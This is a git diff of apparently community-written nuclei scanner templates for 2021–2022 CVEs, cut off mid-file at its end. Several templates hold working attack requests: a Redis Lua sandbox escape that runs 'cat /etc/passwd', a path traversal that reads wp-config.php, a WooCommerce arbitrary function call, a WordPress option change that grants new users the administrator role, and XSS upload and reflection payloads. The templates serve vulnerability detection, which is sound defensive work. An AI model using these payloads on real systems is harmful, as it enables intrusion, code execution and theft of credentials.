a/nuclei-templates/CVE-2021/cve-2021-39211.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-39211 - -info: - name: GLPI Telemetry Disclosure - author: dogasantos,noraj - severity: medium - description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 - - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 - - https://github.com/glpi-project/glpi/releases/tag/9.5.6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-39211 - cwe-id: CWE-668,CWE-200 - tags: cve,cve2021,glpi,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/ajax/telemetry.php" - - "{{BaseURL}}/glpi/ajax/telemetry.php" - - matchers-condition: and - matchers: - - type: word - words: - - '"uuid":' - - '"glpi":' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39433.yaml b/nuclei-templates/CVE-2021/cve-2021-39433.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-39433.yaml rename to nuclei-templates/CVE-2021/cve-2021-39433.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-40149.yaml b/nuclei-templates/CVE-2021/cve-2021-40149.yaml new file mode 100644 index 0000000000..9d9700aaaf --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40149.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-40149 + +info: + name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure + author: For3stCo1d + severity: medium + description: | + Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. + reference: + - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 + cve-id: CVE-2021-40149 + cwe-id: CWE-552 + metadata: + shodan-query: http.title:"Reolink" + verified: "true" + tags: cve,cve2021,reolink,camera,iot,exposure,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/self.key" + + matchers-condition: and + matchers: + - type: word + words: + - "-----BEGIN RSA PRIVATE KEY-----" + - "-----END RSA PRIVATE KEY----" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40323.yaml b/nuclei-templates/CVE-2021/cve-2021-40323.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-40323.yaml rename to nuclei-templates/CVE-2021/cve-2021-40323.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40868.yaml b/nuclei-templates/CVE-2021/cve-2021-40868.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-40868.yaml rename to nuclei-templates/CVE-2021/cve-2021-40868.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41266.yaml b/nuclei-templates/CVE-2021/cve-2021-41266.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41266.yaml rename to nuclei-templates/CVE-2021/cve-2021-41266.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41282.yaml b/nuclei-templates/CVE-2021/cve-2021-41282.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41282.yaml rename to nuclei-templates/CVE-2021/cve-2021-41282.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41291.yaml b/nuclei-templates/CVE-2021/cve-2021-41291.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41291.yaml rename to nuclei-templates/CVE-2021/cve-2021-41291.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41381.yaml b/nuclei-templates/CVE-2021/cve-2021-41381.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41381.yaml rename to nuclei-templates/CVE-2021/cve-2021-41381.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41648.yaml b/nuclei-templates/CVE-2021/cve-2021-41648.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41648.yaml rename to nuclei-templates/CVE-2021/cve-2021-41648.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41826.yaml b/nuclei-templates/CVE-2021/cve-2021-41826.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41826.yaml rename to nuclei-templates/CVE-2021/cve-2021-41826.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41878.yaml b/nuclei-templates/CVE-2021/cve-2021-41878.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41878.yaml rename to nuclei-templates/CVE-2021/cve-2021-41878.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-42551.yaml b/nuclei-templates/CVE-2021/cve-2021-42551.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-42551.yaml rename to nuclei-templates/CVE-2021/cve-2021-42551.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-43778.yaml b/nuclei-templates/CVE-2021/cve-2021-43778.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-43778.yaml rename to nuclei-templates/CVE-2021/cve-2021-43778.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-43810.yaml b/nuclei-templates/CVE-2021/cve-2021-43810.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-43810.yaml rename to nuclei-templates/CVE-2021/cve-2021-43810.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-44077.yaml b/nuclei-templates/CVE-2021/cve-2021-44077.yaml new file mode 100644 index 0000000000..e5f78a77ee --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-44077.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-44077 + +info: + name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution + author: Adam Crosser,gy741 + severity: critical + description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. + reference: + - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a + - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ + - https://github.com/horizon3ai/CVE-2021-44077 + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb + - https://nvd.nist.gov/vuln/detail/CVE-2021-44077 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-44077 + cwe-id: CWE-287 + tags: rce,kev,msf,cve,cve2021,zoho,manageengine + +requests: + - method: GET + path: + - "{{BaseURL}}/RestAPI/ImportTechnicians" + + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'pm_query' + condition: and + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2022/CVE-2022-0288.yaml b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml new file mode 100644 index 0000000000..7023ac1948 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-0288 +info: + name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + remediation: Fixed in version 2.7.12 + reference: + - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2022-0288 + cwe-id: CWE-79 + tags: cve,cve2022,wordpress,xss +requests: + - method: POST + path: + - "{{BaseURL}}" + headers: + Content-Type: "application/x-www-form-urlencoded" + body: | + html_element_selection= + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "" + - "ad-inserter" + condition: and + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2022/cve-2022-0378.yaml b/nuclei-templates/CVE-2022/CVE-2022-0378.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0378.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0378.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-0482.yaml b/nuclei-templates/CVE-2022/CVE-2022-0482.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-0482.yaml rename to nuclei-templates/CVE-2022/CVE-2022-0482.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml b/nuclei-templates/CVE-2022/CVE-2022-0543.yaml deleted file mode 100644 index 00d78f467c..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-0543 -info: - name: Redis Sandbox Escape - Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The - vulnerability was introduced by Debian and Ubuntu Redis packages that - insufficiently sanitized the Lua environment. The maintainers failed to - disable the package interface, allowing attackers to load arbitrary libraries. - reference: - - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - - https://bugs.debian.org/1005787 - - https://www.debian.org/security/2022/dsa-5081 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2022-0543 - metadata: - shodan-query: redis_version - tags: cve,cve2022,network,redis,unauth,rce,kev -network: - - inputs: - - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" - host: - - "{{Hostname}}" - - "{{Host}}:6379" - read-size: 64 - matchers: - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0595.yaml b/nuclei-templates/CVE-2022/CVE-2022-0595.yaml deleted file mode 100644 index c7eba1bbd5..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0595.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-0595 -info: - name: Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS - author: akincibor - severity: medium - description: The plugin allows SVG files to be uploaded by default via the dnd_codedropz_upload AJAX action, which could lead to Stored Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de - - https://plugins.trac.wordpress.org/changeset/2686614 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0595 - cwe-id: CWE-79 - tags: cve,cve2022,xss,wordpress,wp-plugin -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161 - - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="size_limit" - - 10485760 - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="action" - - dnd_codedropz_upload - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="type" - - click - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.svg" - Content-Type: image/jpeg - - - -----------------------------92633278134516118923780781161-- - - | - GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "alert(document.domain)")' - - 'status_code_2 == 200' - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-0599.yaml b/nuclei-templates/CVE-2022/CVE-2022-0599.yaml new file mode 100644 index 0000000000..9c91f354e8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0599.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-0599 +info: + name: The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 - Reflected XSS + author: scent2d + severity: medium + description: | + The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 + - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ + - https://nvd.nist.gov/vuln/detail/cve-2022-0599 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0599 + cwe-id: CWE-79 + tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="> HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'id="mmursp_id" value="\">" />' + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(all_headers_2, "text/html")' + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-0653.yaml b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml new file mode 100644 index 0000000000..e06a6c604a --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0653 + +info: + name: Wordpress Profile Builder Plugin Cross-Site Scripting + author: dhiyaneshDk + severity: medium + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 + - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ + tags: cve,cve2022,wordpress,xss,wp-plugin + description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n." + remediation: Upgrade to version 3.6.5 or later. + classification: + cve-id: CVE-2022-0653 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'here' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0660.yaml b/nuclei-templates/CVE-2022/CVE-2022-0660.yaml new file mode 100644 index 0000000000..04b0da86ab --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0660.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-0660 +info: + name: Microweber < 1.2.11 - Information Disclosure + author: amit-jd + severity: high + description: | + Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11. + reference: + - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/ + - https://github.com/advisories/GHSA-hhrj-wp42-32v3 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 + - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-209 + metadata: + verified: "true" + tags: cve,cve2022,microweber,disclosure,authenticated +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + POST /module/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}admin/view:comments + + class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}} + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - contains(body_2,'QueryException') + - contains(body_2,'SQLSTATE') + - contains(body_2,'runQueryCallback') + - 'contains(all_headers_2,"text/html")' + - 'status_code_2==500' + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-0776.yaml b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml new file mode 100644 index 0000000000..153fbe5e2b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-0776 +info: + name: RevealJS postMessage XSS + author: LogicalHunter + severity: medium + description: Cross-site Scripting (XSS) - DOM in GitHub repository hakimel/reveal.js prior to 4.3.0. + reference: + - https://hackerone.com/reports/691977 + - https://github.com/hakimel/reveal.js/pull/3137 + - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ + classification: + cve-id: CVE-2022-0776 + tags: cve,cve2022,headless,postmessage,revealjs +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: extract + args: + code: | + () => { + return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") + } + matchers: + - type: word + part: extract + words: + - "true" diff --git a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml b/nuclei-templates/CVE-2022/CVE-2022-0870.yaml deleted file mode 100644 index b1aa655570..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-0870 -info: - name: Gogs - SSRF - author: Akincibor - severity: medium - description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. - reference: - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 - - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-0870 - cwe-id: CWE-918 - metadata: - shodan-query: http.favicon.hash:-449283196 - tags: cve,cve2022,ssrf,gogs -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: regex - group: 1 - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: dsl - dsl: - - compare_versions(version, '< 0.12.5') - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0952.yaml b/nuclei-templates/CVE-2022/CVE-2022-0952.yaml deleted file mode 100644 index 3e068044db..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0952.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2022-0952 -info: - name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update - author: random-robbie - severity: high - description: | - The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin - reference: - - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b - - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-0952 - cwe-id: CWE-862 - metadata: - verified: "true" - tags: cve,cve2022,wordpress,wp,wp-plugin,sitemap -requests: - - raw: - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"1"} - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"default_role":"administrator"} - - | - POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 - Host: {{Hostname}} - Content-type: application/json;charset=UTF-8 - - {"users_can_register":"0"} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(all_headers, "application/json")' - - "status_code == 200" - - "contains(body_1, 'users_can_register')" - - "contains(body_2, 'default_role')" - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-0954.yaml b/nuclei-templates/CVE-2022/CVE-2022-0954.yaml new file mode 100644 index 0000000000..09542ab5a1 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0954.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-0954 + +info: + name: Microweber - Cross-site Scripting + author: amit-jd + severity: medium + description: | + Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. + reference: + - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 + - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ + - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0954 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,microweber,huntr + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /api/save_option HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother + + - | + POST /module/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B + + cookie-reuse: true + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2,"true")' + - contains(body_3,'\">\" placeholder=\"Use default') + - 'contains(all_headers_3,"text/html")' + - 'status_code_3==200' + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-0963.yaml b/nuclei-templates/CVE-2022/CVE-2022-0963.yaml deleted file mode 100644 index 7982c258c3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0963.yaml +++ /dev/null @@ -1,64 +0,0 @@ -id: CVE-2022-0963 -info: - name: Microweber > 1.2.12 - Cross-Site Scripting - author: amit-jd - severity: medium - description: | - Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack. - reference: - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ - - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0963 - - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0963 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,microweber,cms,authenticated -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - POST /plupload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034 - Referer: {{BaseURL}}admin/view:modules/load_module:files - - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="name" - - {{randstr}}.xml - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunk" - - 0 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="chunks" - - 1 - -----------------------------59866212126262636974202255034 - Content-Disposition: form-data; name="file"; filename="blob" - Content-Type: application/octet-stream - - alert(document.domain) - -----------------------------59866212126262636974202255034-- - - | - GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1 - Host: {{Hostname}} - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'contains(body_3,"alert(document.domain)")' - - 'status_code_3==200' - - 'contains(body_2,"bytes_uploaded")' - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-1020.yaml b/nuclei-templates/CVE-2022/CVE-2022-1020.yaml new file mode 100644 index 0000000000..32720cd261 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1020.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-1020 +info: + name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call + author: Akincibor + severity: critical + description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. + reference: + - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1020 + cwe-id: CWE-352,CWE-862 + tags: wp,wp-plugin,wordpress,cve,cve2022,unauth +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + option_key=a&perpose=update&callback=phpinfo + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1119.yaml b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml new file mode 100644 index 0000000000..9f39aee98b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-1119 +info: + name: WordPress Simple File List <3.2.8 - Local File Inclusion + author: random-robbie + severity: high + description: | + WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + reference: + - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e + - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 + - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1119 + cwe-id: CWE-22 + tags: cve,cve2022,lfi,wordpress,wp,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml b/nuclei-templates/CVE-2022/CVE-2022-1221.yaml deleted file mode 100644 index ca0ab04ccb..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-1221 -info: - name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting - author: veshraj - severity: medium - description: | - The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. - reference: - - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1221 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: xss,wordpress,wp-plugin,wp,cve,cve2022 -requests: - - method: GET - path: - - 